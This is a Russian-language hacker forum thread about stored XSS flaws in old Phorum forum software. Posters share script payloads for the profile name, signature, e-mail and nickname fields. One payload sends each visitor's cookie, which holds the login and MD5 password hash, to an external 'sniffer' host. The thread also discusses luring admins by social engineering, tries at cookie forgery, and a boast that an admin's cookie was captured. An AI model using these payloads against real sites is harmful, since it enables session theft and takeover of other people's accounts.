CyberLords тима, обнаружила данную XSS в форумах Phorum до 5.0.14 версии. Суть уязвимости в том что за регавшись на форуме, в контрольном меню можно ввести прозивольную XSS. А точнее заходим в раздел редактирования профиля My Profile-->Edit My Profile В поле Real Name вводим имя затем XSS, пример: Code: Вовочка<script>alert(document.cookie)</script> Сохраняем, при просмотре профиля выскачит окно с вашими куками, точенее ваш логин и MD5 хеш, то что нам нужно Теперь как можно употребить на других, В поле Real Nаme вставим: Code: Вовочка<script>img = new Image(); img.src = "http://site.com/снифер/сниф.jpg?"+document.cookie;</script> Или че то подобное, где URL это адрес снифера. Теперь каждый юзверь при просмотре вашего профиля отсылает на лог снифера свой логин и хеш МД5. Вопрос как заманить нужную жертву (админ или модер) на ваш профиль...это дело соц. инженерии. Теперь, подделка куков, жаль не сработала, вчера пыхтел любыми путями, не получилось Может у кого другого получитса, дай знать. Братец KEZ от снеми видео, еси такое дело с куками провернётса Просто этот форум времмено содержит куки, которые через некоторое время уничтажаютса, что требует повторной авторизации.
Я эту фишку уже как 2 недели назад просек. Да её и заманивать никуда не недо , вставляешь скрипт в поле подписи, и просто гуляешь по форуму=) Да, с подделкой действительно траблы, так что тут приходится все рассшифровывать.
Вроде в поле "подписи" эту уязвимость я не заметил, ты о чем?? а кто против?, античату да и всем наоборот лучше
Извиняюсь, немного провтыкал. А штука там такя, проверки в подписи нет только когда смотришь профайл, при посте же, вводится проверка на <>, так что внедрение скрипта в подпись в данном случае не прокатит. Беру свои слова назад, без просмотра жертвой профайла ничего не выйдет. Кстати, в phorume присутствуют bb теги, эт. так, для размышлений..... А насчет видео, в принципе всё и так понятно, но если есть потребность......будет и предложение.
Прикинь, доснял видео, заархивировал, думаю загляну ещё раз в лог сниффа, а уменя там админ уже сидит, гы-гы, даже никакой СИ не понадобилось, просто пиши в строке подписи FUCKING USA!!! и все. Вобщем сплошной ЛОЛ.
Давеча ковырялся в старенькой версии phorum, несмотря на старость её можно найти на просторах инета оч. легко, и наткнулся на такой баг. При анонимном ответе, в поле Your E-mail: вставляю Code: gates@microsoft.com"><script>alert('')</script> и пока кто-нить после меня не оставит сообщение, все ловят алерт.=) p.s. KEZ, где ты ещё нашел, не в bb ль тегах?
Morph"><script>alert('Morph Forever')</script> это еще в поле ник проходит =) Тока я зайти не могу еще чтонить поищем ))